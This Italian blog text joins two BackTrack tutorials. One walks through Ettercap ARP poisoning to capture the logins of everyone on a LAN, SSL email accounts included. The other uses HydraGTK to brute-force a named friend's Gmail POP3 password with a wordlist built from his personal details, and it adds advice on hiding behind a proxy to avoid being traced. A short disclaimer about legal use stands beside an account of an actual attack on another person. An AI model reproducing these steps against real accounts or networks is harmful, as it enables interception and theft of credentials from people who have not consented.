(attenzione alla formattazione del blog , le righe sono unite , quindi selezionatele ricorsivamente)

Una volta tolti i simboli “#” dalle due righe facciamo un Overwrite , e cioé sovrascriviamo il file con i nostri cambiamenti , con la combinazione di tasti “Ctrl + O“ , subito dopo , quando il sistema ci chiederà di sovrascrivere il file noi risponderemo premendo Invio , e quindi accettando le modifiche al file.

Fatto questo non ci resta che avviare Ettercap , quindi:

—> MenùStart di KDE -> Privilege Escalation -> Sniffer -> Ettercap

Alla comparsa dell’interfaccia grafica , sul menù della finestra di Ettercap andiamo su Sniff –> Unified Sniffing –> eth0 (nel mio caso ho inserito eth0 , per indicare la mia ethernet , ma se siamo all’interno di una LAN basta selezionare il device che si trova sempre nella scelta dal menù Unified Sniffing).

Sullo spazio di dialogo tra l’utente e l’ Ettercap , se tutto è ok , vedremo comparire una scritta tipo questa:

___________________________________________

<code>Privileges dropped to UID 65534 GID 65534…

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
</code>

___________________________________________

Questo testa che Ettercap ha letto tutte le informazioni riguardanti il nostro host , e che quindi Ettercap è pronto , per farlo partire con lo scanning dell’ host basta premere la combinazione Ctrl + S.

Una volta partito lo scan , amdiamo subito sulla seziona Mitm del menu principale di Ettercap e selezioniamo Arp Poisoning e quando ci comparirà la finestra di dialogo per la scelta dei parametri opzionali noi , (essendo all’interno di una LAN) , sceglieremo una connessione remota e quindi dovremo mettere la spunta di selezione su Sniff Remote Connection.

Fatto questo non ci resta che partire con lo sniffing dandogli lo andando sullo Start del menù principale e selezionando Start Sniffing.

Se tutto è OK nella finestra di dialogo di Ettercap si avranno informazioni di questo genere:

___________________________________________

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)
Unified sniffing already started…
Unified sniffing already started…
Unified sniffing was stopped.
Starting Unified sniffing…

___________________________________________
Significa che Ettercap sta lavorando…

A questo punto , tutte le persone che sono nella nostra LAN , sono delle potenziali vittime , perché quando andranno ad accedere ad esempio sul loro account mail , e Ettercap esegue lo sniffing anche su account cifrati con SSL come Hotmail e Gmail , si vedranno comparire davanti una finestra di dialogo che gli chiederà di esaminare il certificato dell’account , (come se ne vedono tanti) , e al momento del loro consenso voi avrete con Ettercap tutti i dati del loro account mail.

Questo vale per tutti i login effettuati dalle potenziali vittime all’interno di una rete LAN , come può essere ad esempio una rete aziendale , e che sono sotto l’interfaccia di rete riconosciuta da Ettercap.

Alla prossima.

Eccoci arrivati ad uno di quei punti “caldi” , dove scriverò su come poter scoprire le password di account mail , naturalmente tramite la nostra distro GNU/Linux BackTrack.

Come prima cosa , e come sempre faccio , ringrazio tutti quei siti , forum e blog che ci sono in rete e che mi hanno dato la possibilità di imparare ad usare i tool.

I siti di cui io parlo naturalmente sono gli stessi che elenco sempre alla fine dei miei messaggi , e cioé:

il remote-exploit team , che ha creato una distribuzione unica nel suo genere.

il forum-remote-exploit , per il suo supporto aiuta quelli che come me voglio imparare tutti i tool della BackTrack.

il sito IronGeek , a cui mi tengo sempre aggiornato per tutte le ottime novità e il gruppo The Hacker Choise , sviluppatori di Hydra.

Senza tralasciare naturalmente tutto il mondo GNU/Linux che tanto continua a darmi e a coinvolgermi.

Passiamo ora ai fatti , e a vedere come riuscire a scoprire password di account mail.

vi dico subito che è possibile e anche facile , ma non è una cosa fattibile in un secondo , nel senso che come in tutte le cose , bisogna aver pazienza , perché lo “scoprire la password” , può dipendere da fattori che si possono risolvere in pochissimo o anche in tanto e troppo tempo , ed ora vediamo il perché.

Allora , per scoprire la password di un account mail , useremo l’ Xhydra (la X sta per la versione GTK , ovvero con interfaccia grafica , nel WM Flux , che personalmente uso , il programma viene indicato ancora come Hydra-GTK) , programma ovviamente incluso nellanostra distribuzione BackTrack.

Dal menu principale di KDE , lo start , andiamo conseguentemente nel submenù “backtrack” , dopodiché nelle seguenti sezioni: privilege escalation —> password attack —>password online attack —> Hydra —> HydraGTK.

hydragtk-1.png (immagine grafica di come arrivare a HydraGTK)

all’apertura della finestra di HydraGTK , dovremo inserire nelle opzioni dei dati , dati che riguardano la vittima , o meglio , la casella di posta della vittima.

nella parte superiore della finestra ci vengono chieste 2 infirmazioni:

1- target e 2- target list , la prima opzione serve ad inserire i dati del server di cui la casella mail vittima fa parte , prendiamo come esempio una casella di posta Gmail , cambierò la password appositamente per questa occasione…:)

il server di posta Gmail , per l’ingresso dei dati si serve , come la maggiorparte degli account mail , di server tipo pop3. e nel target quindi dovremo inserire i dati della casella di ingresso di Gmail , e cioé:

pop.gmail.com (la seconda opzione la spiegherò alla fine dell’articolo).

nella parte bassa della finestra di HydraGTK , ci viene chiesto il modo di output , e cioé il modo in cui noi vogliamo avere le informazioni che Hydra cercherà per noi. Noi scegliamo , per comodità il modo verbose , e cioé tramite l’ultima linguetta nella parte superiore della finestra dove Hydra stamperà a fine lavoro i nostri dati , e cioé la password.

Clicando sulla seconda linguetta in altro della finestra di Hydra ci vengono chieste altre due opzioni:

1- username

1a- username list

2- password

2- password list

Nella casella dello username inseriamo ovviamente lo username della vittima , che nel nostro caso è il mio amico Rabi , (che so che anche se si incazza , non è molto persistene la cosa , e poi gliel’ avevo promesso che gli avrei scoperto la password uno di questi giorni…;))

Nella casella della password non inseriamo nulla , perché ovviamente è il dato che noi dobbiamo scoprire ; nella seconda opzione , che noi dobbiamo ovviamente selezionare ,e cioé la password list , appena ci clicchiamo sopra si apre una finestra di ricerca , che ci chiede un filecon estensione *.txt , questo file dovrà contenere tutte le parole che noi pensiamo possano essere usate dalla vittimacome propria password , e sono informazioni che possono essere reperite solo conoscendo la persona , oppure tramite Google , anche perché non si vuole scoprire la password di una persona che nemmeno si conosce ……giusto?

e quindi selezioniamo il nostro file con estensione *.txt , ed otterremo una finestra di questo tipo:

Una volta cliccato sulla terza linguetta ci vengono chieste altre 3 informazioni , di cui 2 obbligatorie:

1- Number of taks : ovvero il numero di tentativi che Hydra farà ogni ‘tot di tempo , tempo che inseriremo nella seconda opzione.(2)

2- Timeout , (il tempo che Hydra usa per separare le eventuali password) , dove se noi inseriamo 50 , il tempo è in secondi , diremo ad Hydra di provare con un tentativo , e quindi una parola contenuta nel file di testo chiamato pwdlist.txt , ogni 50 secondi.

Nel riquadro in basso invece , abbiamo la possibilità di nascondere i nostri tentativi dietro un proxy , in modo che in caso di password difficile da trovare se ci fosse il problema dell’ identificazione , potremo essere rintracciabili , invece nascondendoci dietro un proxy saremo irriconoscibili , perché le informazioni partiranno dal nostro Pc , e non arriveranno alla casella mil della vittima prima di esser passate per il proxy che ne nasconderà la provenienza. Nel nostro caso il proxy non serve , e quindi lasciamo la spunta su “No proxy” , ed avremo una finestra del genere:

Ora abbiamo praticamente finito di inserire le informazioni e possiamo passare direttamente a cliccare la quinta linguetta di HydraGTK , visto che la quarta contiene solo delle informazioni di tuning.

Dopo aver lanciato lo start di Hydra ho avuto il risultato solo dopo 10 ore…..è ovvio che per troppi motivi , non posso scrivervi la password di rabi , anche se lui non avrebbe nulla in contrario visto che la cambierà presto ma le leggi ed io sono daccordo con esse , ci danno l’ HydraGTK per testare la sicurezza propria , non per crackare altri account

il risultato di HydraGTK sarà una cosa del genere:

_____________________________________________________

Hydra v5.3 (c) 2006 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2007-09-26 18:50:38
[DATA] 1 tasks, 1 servers, 1301 login tries (l:1/p:3000), ~3 tries per task
[DATA] attacking service pop3 on port 995
[VERBOSE] Resolving addresses … done username <******> password <*************>
[STATUS] attack finished for pop.gmail.com (waiting for childs to finish)

Hydra (http://www.thc.org) finished at 2007-09-27 04:50:59

<finished>

_______________________________________________________

Ora naturalmente io avevo sicuramente dei vantaggi…ad esempio conosco molto bene Rabi , cono i suoi gusti musicali che si sono rivelati fondamentali per scoprire la sua password , so che anche se non lo è , gioca a fare il metallaro satanista , e tutte queste informazioni sono state utilissime per me , perché dopo essermi costruito una passwordlist solo per il suo account Gmail , ho fatto qualche centinaio di login e poi sono riuscito ad ottenere la sua password , ed è così che si realizza un attacco , con pazienza.

Io prima cerco tutte le informazioni su di una persona , se la conosco ovviamente l’attacco risulterà più breve e facile , ma se sono a conoscenza di poche informazioni devo cercarle , ci sono molti metodi e se si vuole , sempre con pazienza , si arriva a riuscirci a scoprire utili informazioni che noi dovremo tradurre in eventuali password da inserire nel file di testo che ci serve per l’ attacco , aggiunte naturalmente ad un dizionario , che non è altro che un grandissimo file di testo contenente migliaia di parole messe nel file di testo uno sotto l’altra.

Esiste l’elenco di pagine gialle….l’elenco telecom , c’é Google , che tramite l’inserimento di “nome cognome” messi tra virgolette ci dà spesso dei bei risultati.

Io tra breve inserirò un BOX dove condividere con voi dizionari e provare la vostra sicurezza.

Ci sono altri programmi naturalmente , oltre a Hydra e HydraGTK , c’é ad esempio l’Elzapop o il Bruteforce , ma io rimango dell’idea che Hydra sia il migliore , infatti la particolarità che rende Hydra unico , è il fatto di fare 1 login , e quindi una prova di attacco , ogni ‘tot secondi , altrimenti i nuovi protocolli ci rimandano indietro dal login e si bloccano senza farci nemmeno più provare le nostre parole inserite nel file di testo , con Hydra invece l’unica cosa che ci serve oltre ad un buon file di testo abbinato ed arricchito con le nostre parole , è la buona e santa pazienza…..per il resto , ci pensa Hydra!